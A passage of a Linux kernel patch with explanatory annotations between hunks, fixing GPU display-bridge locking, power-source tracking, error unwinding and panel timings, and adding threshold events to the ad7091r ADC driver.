+-		dcn314_disable_otg_wa(clk_mgr_base, context, false);
++		dcn314_disable_otg_wa(clk_mgr_base, context, safe_to_lower, false);
+ 
+ 		update_dispclk = true;
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+index 67287ad07226c..e2f436dea5654 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+@@ -818,6 +818,8 @@ bool is_psr_su_specific_panel(struct dc_link *link)
+ 				isPSRSUSupported = false;
+ 			else if (dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x03)
+ 				isPSRSUSupported = false;
++			else if (dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x03)
++				isPSRSUSupported = false;
+ 			else if (dpcd_caps->psr_info.force_psrsu_cap == 0x1)
+ 				isPSRSUSupported = true;
+ 		}
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 47ff3694ffa57..1d0693dad8185 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -24,6 +24,7 @@
+ 
+ #include <linux/firmware.h>
+ #include <linux/pci.h>
++#include <linux/power_supply.h>
+ #include <linux/reboot.h>
+ 
+ #include "amdgpu.h"
+@@ -731,16 +732,8 @@ static int smu_late_init(void *handle)
+ 	 * handle the switch automatically. Driver involvement
+ 	 * is unnecessary.
+ 	 */
+-	if (!smu->dc_controlled_by_gpio) {
+-		ret = smu_set_power_source(smu,
+-					   adev->pm.ac_power ? SMU_POWER_SOURCE_AC :
+-					   SMU_POWER_SOURCE_DC);
+-		if (ret) {
+-			dev_err(adev->dev, "Failed to switch to %s mode!\n",
+-				adev->pm.ac_power ? "AC" : "DC");
+-			return ret;
+-		}
+-	}
++	adev->pm.ac_power = power_supply_is_system_supplied() > 0;
++	smu_set_ac_dc(smu);
+ 
+ 	if ((adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 1)) ||
+ 	    (adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 3)))
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+index d490b571c8ffa..2e061a74a0b7e 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+@@ -1467,10 +1467,12 @@ static int smu_v11_0_irq_process(struct amdgpu_device *adev,
+ 			case 0x3:
+ 				dev_dbg(adev->dev, "Switched to AC mode!\n");
+ 				schedule_work(&smu->interrupt_work);
++				adev->pm.ac_power = true;
+ 				break;
+ 			case 0x4:
+ 				dev_dbg(adev->dev, "Switched to DC mode!\n");
+ 				schedule_work(&smu->interrupt_work);
++				adev->pm.ac_power = false;
+ 				break;
+ 			case 0x7:
+ 				/*
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 1b0fb93539ec4..f3257cf4b06f2 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -1415,10 +1415,12 @@ static int smu_v13_0_irq_process(struct amdgpu_device *adev,
+ 			case 0x3:
+ 				dev_dbg(adev->dev, "Switched to AC mode!\n");
+ 				smu_v13_0_ack_ac_dc_interrupt(smu);
++				adev->pm.ac_power = true;
+ 				break;
+ 			case 0x4:
+ 				dev_dbg(adev->dev, "Switched to DC mode!\n");
+ 				smu_v13_0_ack_ac_dc_interrupt(smu);
++				adev->pm.ac_power = false;
+ 				break;
+ 			case 0x7:
+ 				/*
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.c b/drivers/gpu/drm/bridge/analogix/anx7625.c
+index cf86cc05b7fca..5f8137e9cfd7a 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.c
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.c
+@@ -1742,6 +1742,7 @@ static ssize_t anx7625_aux_transfer(struct drm_dp_aux *aux,
+ 	u8 request = msg->request & ~DP_AUX_I2C_MOT;
+ 	int ret = 0;
+ 
++	mutex_lock(&ctx->aux_lock);
+ 	pm_runtime_get_sync(dev);
+ 	msg->reply = 0;
+ 	switch (request) {
+@@ -1758,6 +1759,7 @@ static ssize_t anx7625_aux_transfer(struct drm_dp_aux *aux,
+ 					msg->size, msg->buffer);
+ 	pm_runtime_mark_last_busy(dev);
+ 	pm_runtime_put_autosuspend(dev);
++	mutex_unlock(&ctx->aux_lock);
+ 
+ 	return ret;
+ }
+@@ -2454,7 +2456,9 @@ static void anx7625_bridge_atomic_disable(struct drm_bridge *bridge,
+ 	ctx->connector = NULL;
+ 	anx7625_dp_stop(ctx);
+ 
+-	pm_runtime_put_sync(dev);
++	mutex_lock(&ctx->aux_lock);
++	pm_runtime_put_sync_suspend(dev);
++	mutex_unlock(&ctx->aux_lock);
+ }
+ 
+ static enum drm_connector_status
+@@ -2648,6 +2652,7 @@ static int anx7625_i2c_probe(struct i2c_client *client)
+ 
+ 	mutex_init(&platform->lock);
+ 	mutex_init(&platform->hdcp_wq_lock);
++	mutex_init(&platform->aux_lock);
+ 
+ 	INIT_DELAYED_WORK(&platform->hdcp_work, hdcp_check_work_func);
+ 	platform->hdcp_workqueue = create_workqueue("hdcp workqueue");
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.h b/drivers/gpu/drm/bridge/analogix/anx7625.h
+index 14f33d6be289f..239956199e1b9 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.h
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.h
+@@ -471,6 +471,8 @@ struct anx7625_data {
+ 	struct workqueue_struct *hdcp_workqueue;
+ 	/* Lock for hdcp work queue */
+ 	struct mutex hdcp_wq_lock;
++	/* Lock for aux transfer and disable */
++	struct mutex aux_lock;
+ 	char edid_block;
+ 	struct display_timing dt;
+ 	u8 display_timing_valid;
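Both this bridge and the parade-ps8640 hunk that follows add the same guard: DPCD aux transfers and the bridge disable path now serialize on aux_lock, and disable uses pm_runtime_put_sync_suspend(), so an in-flight transfer can no longer hold a runtime-PM reference that keeps the chip awake while it is being torn down. The two sides, sketched with pthreads and trivial PM stand-ins:

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t aux_lock = PTHREAD_MUTEX_INITIALIZER;

/* Trivial stand-ins for the runtime-PM and hardware calls. */
static void pm_get(void)              { puts("pm get"); }
static void pm_put_autosuspend(void)  { puts("pm put (autosuspend)"); }
static void pm_put_sync_suspend(void) { puts("pm put (sync suspend)"); }
static void do_aux_io(void)           { puts("aux transfer"); }

static void aux_transfer(void)
{
	pthread_mutex_lock(&aux_lock);	/* can't race the disable path now */
	pm_get();
	do_aux_io();
	pm_put_autosuspend();
	pthread_mutex_unlock(&aux_lock);
}

static void bridge_disable(void)
{
	pthread_mutex_lock(&aux_lock);	/* waits out any in-flight transfer */
	pm_put_sync_suspend();		/* device really suspends here */
	pthread_mutex_unlock(&aux_lock);
}

int main(void)
{
	aux_transfer();
	bridge_disable();
	return 0;
}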
+diff --git a/drivers/gpu/drm/bridge/nxp-ptn3460.c b/drivers/gpu/drm/bridge/nxp-ptn3460.c
+index 0851101a8c724..8686b20ac317d 100644
+--- a/drivers/gpu/drm/bridge/nxp-ptn3460.c
++++ b/drivers/gpu/drm/bridge/nxp-ptn3460.c
+@@ -54,13 +54,13 @@ static int ptn3460_read_bytes(struct ptn3460_bridge *ptn_bridge, char addr,
+ 	int ret;
+ 
+ 	ret = i2c_master_send(ptn_bridge->client, &addr, 1);
+-	if (ret <= 0) {
++	if (ret < 0) {
+ 		DRM_ERROR("Failed to send i2c command, ret=%d\n", ret);
+ 		return ret;
+ 	}
+ 
+ 	ret = i2c_master_recv(ptn_bridge->client, buf, len);
+-	if (ret <= 0) {
++	if (ret < 0) {
+ 		DRM_ERROR("Failed to recv i2c data, ret=%d\n", ret);
+ 		return ret;
+ 	}
+@@ -78,7 +78,7 @@ static int ptn3460_write_byte(struct ptn3460_bridge *ptn_bridge, char addr,
+ 	buf[1] = val;
+ 
+ 	ret = i2c_master_send(ptn_bridge->client, buf, ARRAY_SIZE(buf));
+-	if (ret <= 0) {
++	if (ret < 0) {
+ 		DRM_ERROR("Failed to send i2c command, ret=%d\n", ret);
+ 		return ret;
+ 	}
+diff --git a/drivers/gpu/drm/bridge/parade-ps8640.c b/drivers/gpu/drm/bridge/parade-ps8640.c
+index 083337a279665..09737acc2cf41 100644
+--- a/drivers/gpu/drm/bridge/parade-ps8640.c
++++ b/drivers/gpu/drm/bridge/parade-ps8640.c
+@@ -106,6 +106,7 @@ struct ps8640 {
+ 	struct device_link *link;
+ 	bool pre_enabled;
+ 	bool need_post_hpd_delay;
++	struct mutex aux_lock;
+ };
+ 
+ static const struct regmap_config ps8640_regmap_config[] = {
+@@ -353,11 +354,20 @@ static ssize_t ps8640_aux_transfer(struct drm_dp_aux *aux,
+ 	struct device *dev = &ps_bridge->page[PAGE0_DP_CNTL]->dev;
+ 	int ret;
+ 
++	mutex_lock(&ps_bridge->aux_lock);
+ 	pm_runtime_get_sync(dev);
++	ret = _ps8640_wait_hpd_asserted(ps_bridge, 200 * 1000);
++	if (ret) {
++		pm_runtime_put_sync_suspend(dev);
++		goto exit;
++	}
+ 	ret = ps8640_aux_transfer_msg(aux, msg);
+ 	pm_runtime_mark_last_busy(dev);
+ 	pm_runtime_put_autosuspend(dev);
+ 
++exit:
++	mutex_unlock(&ps_bridge->aux_lock);
++
+ 	return ret;
+ }
+ 
+@@ -476,7 +486,18 @@ static void ps8640_post_disable(struct drm_bridge *bridge)
+ 	ps_bridge->pre_enabled = false;
+ 
+ 	ps8640_bridge_vdo_control(ps_bridge, DISABLE);
++
++	/*
++	 * The bridge seems to expect everything to be power cycled at the
++	 * disable process, so grab a lock here to make sure
++	 * ps8640_aux_transfer() is not holding a runtime PM reference and
++	 * preventing the bridge from suspend.
++	 */
++	mutex_lock(&ps_bridge->aux_lock);
++
+ 	pm_runtime_put_sync_suspend(&ps_bridge->page[PAGE0_DP_CNTL]->dev);
++
++	mutex_unlock(&ps_bridge->aux_lock);
+ }
+ 
+ static int ps8640_bridge_attach(struct drm_bridge *bridge,
+@@ -657,6 +678,8 @@ static int ps8640_probe(struct i2c_client *client)
+ 	if (!ps_bridge)
+ 		return -ENOMEM;
+ 
++	mutex_init(&ps_bridge->aux_lock);
++
+ 	ps_bridge->supplies[0].supply = "vdd12";
+ 	ps_bridge->supplies[1].supply = "vdd33";
+ 	ret = devm_regulator_bulk_get(dev, ARRAY_SIZE(ps_bridge->supplies),
+diff --git a/drivers/gpu/drm/bridge/sii902x.c b/drivers/gpu/drm/bridge/sii902x.c
+index 878fb7d3732ba..6359d6f53a1b6 100644
+--- a/drivers/gpu/drm/bridge/sii902x.c
++++ b/drivers/gpu/drm/bridge/sii902x.c
+@@ -171,7 +171,6 @@ struct sii902x {
+ 	struct drm_connector connector;
+ 	struct gpio_desc *reset_gpio;
+ 	struct i2c_mux_core *i2cmux;
+-	struct regulator_bulk_data supplies[2];
+ 	bool sink_is_hdmi;
+ 	/*
+ 	 * Mutex protects audio and video functions from interfering
+@@ -1041,6 +1040,26 @@ static int sii902x_init(struct sii902x *sii902x)
+ 			return ret;
+ 	}
+ 
++	ret = sii902x_audio_codec_init(sii902x, dev);
++	if (ret)
++		return ret;
++
++	i2c_set_clientdata(sii902x->i2c, sii902x);
++
++	sii902x->i2cmux = i2c_mux_alloc(sii902x->i2c->adapter, dev,
++					1, 0, I2C_MUX_GATE,
++					sii902x_i2c_bypass_select,
++					sii902x_i2c_bypass_deselect);
++	if (!sii902x->i2cmux) {
++		ret = -ENOMEM;
++		goto err_unreg_audio;
++	}
++
++	sii902x->i2cmux->priv = sii902x;
++	ret = i2c_mux_add_adapter(sii902x->i2cmux, 0, 0, 0);
++	if (ret)
++		goto err_unreg_audio;
++
+ 	sii902x->bridge.funcs = &sii902x_bridge_funcs;
+ 	sii902x->bridge.of_node = dev->of_node;
+ 	sii902x->bridge.timings = &default_sii902x_timings;
+@@ -1051,19 +1070,13 @@ static int sii902x_init(struct sii902x *sii902x)
+ 
+ 	drm_bridge_add(&sii902x->bridge);
+ 
+-	sii902x_audio_codec_init(sii902x, dev);
++	return 0;
+ 
+-	i2c_set_clientdata(sii902x->i2c, sii902x);
++err_unreg_audio:
++	if (!PTR_ERR_OR_ZERO(sii902x->audio.pdev))
++		platform_device_unregister(sii902x->audio.pdev);
+ 
+-	sii902x->i2cmux = i2c_mux_alloc(sii902x->i2c->adapter, dev,
+-					1, 0, I2C_MUX_GATE,
+-					sii902x_i2c_bypass_select,
+-					sii902x_i2c_bypass_deselect);
+-	if (!sii902x->i2cmux)
+-		return -ENOMEM;
+-
+-	sii902x->i2cmux->priv = sii902x;
+-	return i2c_mux_add_adapter(sii902x->i2cmux, 0, 0, 0);
++	return ret;
+ }
+ 
+ static int sii902x_probe(struct i2c_client *client,
+@@ -1072,6 +1085,7 @@ static int sii902x_probe(struct i2c_client *client,
+ 	struct device *dev = &client->dev;
+ 	struct device_node *endpoint;
+ 	struct sii902x *sii902x;
++	static const char * const supplies[] = {"iovcc", "cvcc12"};
+ 	int ret;
+ 
+ 	ret = i2c_check_functionality(client->adapter,
+@@ -1122,38 +1136,22 @@ static int sii902x_probe(struct i2c_client *client,
+ 
+ 	mutex_init(&sii902x->mutex);
+ 
+-	sii902x->supplies[0].supply = "iovcc";
+-	sii902x->supplies[1].supply = "cvcc12";
+-	ret = devm_regulator_bulk_get(dev, ARRAY_SIZE(sii902x->supplies),
+-				      sii902x->supplies);
++	ret = devm_regulator_bulk_get_enable(dev, ARRAY_SIZE(supplies), supplies);
+ 	if (ret < 0)
+-		return ret;
+-
+-	ret = regulator_bulk_enable(ARRAY_SIZE(sii902x->supplies),
+-				    sii902x->supplies);
+-	if (ret < 0) {
+-		dev_err_probe(dev, ret, "Failed to enable supplies");
+-		return ret;
+-	}
++		return dev_err_probe(dev, ret, "Failed to enable supplies");
+ 
+-	ret = sii902x_init(sii902x);
+-	if (ret < 0) {
+-		regulator_bulk_disable(ARRAY_SIZE(sii902x->supplies),
+-				       sii902x->supplies);
+-	}
+-
+-	return ret;
++	return sii902x_init(sii902x);
+ }
+ 
+ static void sii902x_remove(struct i2c_client *client)
+-
+ {
+ 	struct sii902x *sii902x = i2c_get_clientdata(client);
+ 
+-	i2c_mux_del_adapters(sii902x->i2cmux);
+ 	drm_bridge_remove(&sii902x->bridge);
+-	regulator_bulk_disable(ARRAY_SIZE(sii902x->supplies),
+-			       sii902x->supplies);
++	i2c_mux_del_adapters(sii902x->i2cmux);
++
++	if (!PTR_ERR_OR_ZERO(sii902x->audio.pdev))
++		platform_device_unregister(sii902x->audio.pdev);
+ }
+ 
+ static const struct of_device_id sii902x_dt_ids[] = {
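
The sii902x rework above is a standard init-ordering fix: every step that can fail (audio codec init, I2C mux allocation and registration) is moved ahead of drm_bridge_add(), and failures unwind through a label instead of leaking the audio platform device; sii902x_remove() gains the matching unregister. The shape of the pattern, with hypothetical example_* names:

	static int example_init(struct example *ex)
	{
		int ret;

		ret = example_audio_init(ex);	/* fallible, done early */
		if (ret)
			return ret;

		ret = example_mux_init(ex);	/* fallible */
		if (ret)
			goto err_unreg_audio;	/* undo only what succeeded */

		example_publish(ex);		/* cannot fail, done last */
		return 0;

	err_unreg_audio:
		example_audio_exit(ex);
		return ret;
	}
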
+diff --git a/drivers/gpu/drm/drm_plane.c b/drivers/gpu/drm/drm_plane.c
+index 33357629a7f52..7a4af43e2cd18 100644
+--- a/drivers/gpu/drm/drm_plane.c
++++ b/drivers/gpu/drm/drm_plane.c
+@@ -1382,6 +1382,7 @@ retry:
+ out:
+ 	if (fb)
+ 		drm_framebuffer_put(fb);
++	fb = NULL;
+ 	if (plane->old_fb)
+ 		drm_framebuffer_put(plane->old_fb);
+ 	plane->old_fb = NULL;
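
The one-line drm_plane change is reference-count hygiene: drm_mode_setplane() funnels every exit through this cleanup and can loop back for a deadlock retry, so the framebuffer pointer must be cleared once its reference has been dropped, exactly as old_fb already is. In miniature, with hypothetical helpers:

	retry:
		ret = take_locks(&ctx);
		if (ret == -EDEADLK)
			goto out;	/* fb may still hold last pass's value */
		fb = lookup_fb(id);	/* takes a reference */
		ret = commit(plane, fb);
	out:
		if (fb)
			drm_framebuffer_put(fb);
		fb = NULL;		/* the fix: a second pass cannot put twice */
		if (ret == -EDEADLK)
			goto retry;	/* backoff elided */
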
+diff --git a/drivers/gpu/drm/exynos/exynos5433_drm_decon.c b/drivers/gpu/drm/exynos/exynos5433_drm_decon.c
+index 8155d7e650f1a..4bc5d9470acdf 100644
+--- a/drivers/gpu/drm/exynos/exynos5433_drm_decon.c
++++ b/drivers/gpu/drm/exynos/exynos5433_drm_decon.c
+@@ -319,9 +319,9 @@ static void decon_win_set_bldmod(struct decon_context *ctx, unsigned int win,
+ static void decon_win_set_pixfmt(struct decon_context *ctx, unsigned int win,
+ 				 struct drm_framebuffer *fb)
+ {
+-	struct exynos_drm_plane plane = ctx->planes[win];
++	struct exynos_drm_plane *plane = &ctx->planes[win];
+ 	struct exynos_drm_plane_state *state =
+-		to_exynos_plane_state(plane.base.state);
++		to_exynos_plane_state(plane->base.state);
+ 	unsigned int alpha = state->base.alpha;
+ 	unsigned int pixel_alpha;
+ 	unsigned long val;
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_fimd.c b/drivers/gpu/drm/exynos/exynos_drm_fimd.c
+index ae6636e6658ec..529033b980b20 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_fimd.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_fimd.c
+@@ -662,9 +662,9 @@ static void fimd_win_set_bldmod(struct fimd_context *ctx, unsigned int win,
+ static void fimd_win_set_pixfmt(struct fimd_context *ctx, unsigned int win,
+ 				struct drm_framebuffer *fb, int width)
+ {
+-	struct exynos_drm_plane plane = ctx->planes[win];
++	struct exynos_drm_plane *plane = &ctx->planes[win];
+ 	struct exynos_drm_plane_state *state =
+-		to_exynos_plane_state(plane.base.state);
++		to_exynos_plane_state(plane->base.state);
+ 	uint32_t pixel_format = fb->format->format;
+ 	unsigned int alpha = state->base.alpha;
+ 	u32 val = WINCONx_ENWIN;
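
Both Exynos hunks replace a by-value copy of the plane with a pointer. The copy snapshotted the whole exynos_drm_plane on the stack, so reads through it no longer track the live plane, and the copy itself is needless stack traffic. Reduced to plain, runnable C:

	#include <stdio.h>

	struct plane { int state; };
	struct ctx { struct plane planes[4]; };

	int main(void)
	{
		struct ctx c = { 0 };
		struct plane copy = c.planes[0];	/* old, buggy shape */
		struct plane *ptr = &c.planes[0];	/* fixed shape */

		c.planes[0].state = 1;
		/* prints: copy sees 0, pointer sees 1 */
		printf("copy sees %d, pointer sees %d\n", copy.state, ptr->state);
		return 0;
	}
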
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_gsc.c b/drivers/gpu/drm/exynos/exynos_drm_gsc.c
+index 964dceb28c1eb..68ea92742b06b 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_gsc.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_gsc.c
+@@ -1342,7 +1342,7 @@ static int __maybe_unused gsc_runtime_resume(struct device *dev)
+ 	for (i = 0; i < ctx->num_clocks; i++) {
+ 		ret = clk_prepare_enable(ctx->clocks[i]);
+ 		if (ret) {
+-			while (--i > 0)
++			while (--i >= 0)
+ 				clk_disable_unprepare(ctx->clocks[i]);
+ 			return ret;
+ 		}
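
The gsc change fixes a classic unwind off-by-one: when enabling clock i fails, clocks 0 through i-1 must all be disabled, but "--i > 0" stops before index 0 and leaves the first clock running. Runnable demonstration in plain C:

	#include <stdio.h>

	int main(void)
	{
		int i, fail_at = 3;

		for (i = 0; i < 5; i++) {
			if (i == fail_at) {		/* simulated failure */
				while (--i >= 0)	/* was: --i > 0, which skips 0 */
					printf("disable clk %d\n", i);
				return 1;
			}
			printf("enable clk %d\n", i);
		}
		return 0;
	}
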
+diff --git a/drivers/gpu/drm/nouveau/nouveau_vmm.c b/drivers/gpu/drm/nouveau/nouveau_vmm.c
+index 67d6619fcd5ed..29b5dedf6db89 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_vmm.c
++++ b/drivers/gpu/drm/nouveau/nouveau_vmm.c
+@@ -108,6 +108,9 @@ nouveau_vma_new(struct nouveau_bo *nvbo, struct nouveau_vmm *vmm,
+ 	} else {
+ 		ret = nvif_vmm_get(&vmm->vmm, PTES, false, mem->mem.page, 0,
+ 				   mem->mem.size, &tmp);
++		if (ret)
++			goto done;
++
+ 		vma->addr = tmp.addr;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index a163585a2a52b..ecd6238749f7a 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -975,6 +975,8 @@ static const struct panel_desc auo_b116xak01 = {
+ 	},
+ 	.delay = {
+ 		.hpd_absent = 200,
++		.unprepare = 500,
++		.enable = 50,
+ 	},
+ };
+ 
+@@ -1870,7 +1872,7 @@ static const struct edp_panel_entry edp_panels[] = {
+ 	EDP_PANEL_ENTRY('A', 'U', 'O', 0x1062, &delay_200_500_e50, "B120XAN01.0"),
+ 	EDP_PANEL_ENTRY('A', 'U', 'O', 0x1e9b, &delay_200_500_e50, "B133UAN02.1"),
+ 	EDP_PANEL_ENTRY('A', 'U', 'O', 0x1ea5, &delay_200_500_e50, "B116XAK01.6"),
+-	EDP_PANEL_ENTRY('A', 'U', 'O', 0x405c, &auo_b116xak01.delay, "B116XAK01"),
++	EDP_PANEL_ENTRY('A', 'U', 'O', 0x405c, &auo_b116xak01.delay, "B116XAK01.0"),
+ 	EDP_PANEL_ENTRY('A', 'U', 'O', 0x615c, &delay_200_500_e50, "B116XAN06.1"),
+ 	EDP_PANEL_ENTRY('A', 'U', 'O', 0x8594, &delay_200_500_e50, "B133UAN01.0"),
+ 
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index 005377f58eb4a..b714ee1bcbaa3 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -3603,6 +3603,7 @@ static const struct panel_desc tianma_tm070jdhg30 = {
+ 	},
+ 	.bus_format = MEDIA_BUS_FMT_RGB888_1X7X4_SPWG,
+ 	.connector_type = DRM_MODE_CONNECTOR_LVDS,
++	.bus_flags = DRM_BUS_FLAG_DE_HIGH,
+ };
+ 
+ static const struct panel_desc tianma_tm070jvhg33 = {
+@@ -3615,6 +3616,7 @@ static const struct panel_desc tianma_tm070jvhg33 = {
+ 	},
+ 	.bus_format = MEDIA_BUS_FMT_RGB888_1X7X4_SPWG,
+ 	.connector_type = DRM_MODE_CONNECTOR_LVDS,
++	.bus_flags = DRM_BUS_FLAG_DE_HIGH,
+ };
+ 
+ static const struct display_timing tianma_tm070rvhg71_timing = {
+diff --git a/drivers/gpu/drm/tidss/tidss_crtc.c b/drivers/gpu/drm/tidss/tidss_crtc.c
+index cd3c43a6c8064..cb66a425dd200 100644
+--- a/drivers/gpu/drm/tidss/tidss_crtc.c
++++ b/drivers/gpu/drm/tidss/tidss_crtc.c
+@@ -170,13 +170,13 @@ static void tidss_crtc_atomic_flush(struct drm_crtc *crtc,
+ 	struct tidss_device *tidss = to_tidss(ddev);
+ 	unsigned long flags;
+ 
+-	dev_dbg(ddev->dev,
+-		"%s: %s enabled %d, needs modeset %d, event %p\n", __func__,
+-		crtc->name, drm_atomic_crtc_needs_modeset(crtc->state),
+-		crtc->state->enable, crtc->state->event);
++	dev_dbg(ddev->dev, "%s: %s is %sactive, %s modeset, event %p\n",
++		__func__, crtc->name, crtc->state->active ? "" : "not ",
++		drm_atomic_crtc_needs_modeset(crtc->state) ? "needs" : "doesn't need",
++		crtc->state->event);
+ 
+ 	/* There is nothing to do if CRTC is not going to be enabled. */
+-	if (!crtc->state->enable)
++	if (!crtc->state->active)
+ 		return;
+ 
+ 	/*
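
The tidss fix hinges on the DRM distinction between two CRTC state bits: "enable" means the CRTC is part of the configuration (it has a mode and connectors), while "active" means it should actually be scanning out right now; an enabled-but-inactive CRTC (e.g. DPMS off) may be powered down. Gating the flush on the wrong bit meant touching disabled hardware. A sketch of the corrected gate:

	static void crtc_atomic_flush(struct drm_crtc *crtc,
				      struct drm_atomic_state *state)
	{
		if (!crtc->state->active)
			return;		/* hardware may be powered down */

		/* ... write registers, arm the vblank event ... */
	}
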
+diff --git a/drivers/iio/adc/ad7091r-base.c b/drivers/iio/adc/ad7091r-base.c
+index 0e5d3d2e9c985..76002b91c86a4 100644
+--- a/drivers/iio/adc/ad7091r-base.c
++++ b/drivers/iio/adc/ad7091r-base.c
+@@ -6,6 +6,7 @@
+  */
+ 
+ #include <linux/bitops.h>
++#include <linux/bitfield.h>
+ #include <linux/iio/events.h>
+ #include <linux/iio/iio.h>
+ #include <linux/interrupt.h>
+@@ -28,6 +29,7 @@
+ #define AD7091R_REG_RESULT_CONV_RESULT(x)   ((x) & 0xfff)
+ 
+ /* AD7091R_REG_CONF */
++#define AD7091R_REG_CONF_ALERT_EN   BIT(4)
+ #define AD7091R_REG_CONF_AUTO   BIT(8)
+ #define AD7091R_REG_CONF_CMD    BIT(10)
+ 
+@@ -49,6 +51,27 @@ struct ad7091r_state {
+ 	struct mutex lock; /* lock to prevent concurrent reads */
+ };
+ 
++const struct iio_event_spec ad7091r_events[] = {
++	{
++		.type = IIO_EV_TYPE_THRESH,
++		.dir = IIO_EV_DIR_RISING,
++		.mask_separate = BIT(IIO_EV_INFO_VALUE) |
++				 BIT(IIO_EV_INFO_ENABLE),
++	},
++	{
++		.type = IIO_EV_TYPE_THRESH,
++		.dir = IIO_EV_DIR_FALLING,
++		.mask_separate = BIT(IIO_EV_INFO_VALUE) |
++				 BIT(IIO_EV_INFO_ENABLE),
++	},
++	{
++		.type = IIO_EV_TYPE_THRESH,
++		.dir = IIO_EV_DIR_EITHER,
++		.mask_separate = BIT(IIO_EV_INFO_HYSTERESIS),
++	},
++};
++EXPORT_SYMBOL_NS_GPL(ad7091r_events, IIO_AD7091R);
++
+ static int ad7091r_set_mode(struct ad7091r_state *st, enum ad7091r_mode mode)
+ {
+ 	int ret, conf;
+@@ -168,8 +191,142 @@ unlock:
+ 	return ret;
+ }
+ 
++static int ad7091r_read_event_config(struct iio_dev *indio_dev,
++				     const struct iio_chan_spec *chan,
++				     enum iio_event_type type,
++				     enum iio_event_direction dir)
++{
++	struct ad7091r_state *st = iio_priv(indio_dev);
++	int val, ret;
++
++	switch (dir) {
++	case IIO_EV_DIR_RISING:
++		ret = regmap_read(st->map,
++				  AD7091R_REG_CH_HIGH_LIMIT(chan->channel),
++				  &val);
++		if (ret)
++			return ret;
++		return val != AD7091R_HIGH_LIMIT;
++	case IIO_EV_DIR_FALLING:
++		ret = regmap_read(st->map,
++				  AD7091R_REG_CH_LOW_LIMIT(chan->channel),
++				  &val);
++		if (ret)
++			return ret;
++		return val != AD7091R_LOW_LIMIT;
++	default:
++		return -EINVAL;
++	}
++}
++
++static int ad7091r_write_event_config(struct iio_dev *indio_dev,
++				      const struct iio_chan_spec *chan,
++				      enum iio_event_type type,
++				      enum iio_event_direction dir, int state)
++{
++	struct ad7091r_state *st = iio_priv(indio_dev);
++
++	if (state) {
++		return regmap_set_bits(st->map, AD7091R_REG_CONF,
++				       AD7091R_REG_CONF_ALERT_EN);
++	} else {
++		/*
++		 * Set thresholds either to 0 or to 2^12 - 1 as appropriate to
++		 * prevent alerts and thus disable event generation.
++		 */
++		switch (dir) {
++		case IIO_EV_DIR_RISING:
++			return regmap_write(st->map,
++					    AD7091R_REG_CH_HIGH_LIMIT(chan->channel),
++					    AD7091R_HIGH_LIMIT);
++		case IIO_EV_DIR_FALLING:
++			return regmap_write(st->map,
++					    AD7091R_REG_CH_LOW_LIMIT(chan->channel),
++					    AD7091R_LOW_LIMIT);
++		default:
++			return -EINVAL;
++		}
++	}
++}
++
++static int ad7091r_read_event_value(struct iio_dev *indio_dev,
++				    const struct iio_chan_spec *chan,
++				    enum iio_event_type type,
++				    enum iio_event_direction dir,
++				    enum iio_event_info info, int *val, int *val2)
++{
++	struct ad7091r_state *st = iio_priv(indio_dev);
++	int ret;
++
++	switch (info) {
++	case IIO_EV_INFO_VALUE:
++		switch (dir) {
++		case IIO_EV_DIR_RISING:
++			ret = regmap_read(st->map,
++					  AD7091R_REG_CH_HIGH_LIMIT(chan->channel),
++					  val);
++			if (ret)
++				return ret;
++			return IIO_VAL_INT;
++		case IIO_EV_DIR_FALLING:
++			ret = regmap_read(st->map,
++					  AD7091R_REG_CH_LOW_LIMIT(chan->channel),
++					  val);
++			if (ret)
++				return ret;
++			return IIO_VAL_INT;
++		default:
++			return -EINVAL;
++		}
++	case IIO_EV_INFO_HYSTERESIS:
++		ret = regmap_read(st->map,
++				  AD7091R_REG_CH_HYSTERESIS(chan->channel),
++				  val);
++		if (ret)
++			return ret;
++		return IIO_VAL_INT;
++	default:
++		return -EINVAL;
++	}
++}
++
++static int ad7091r_write_event_value(struct iio_dev *indio_dev,
++				     const struct iio_chan_spec *chan,
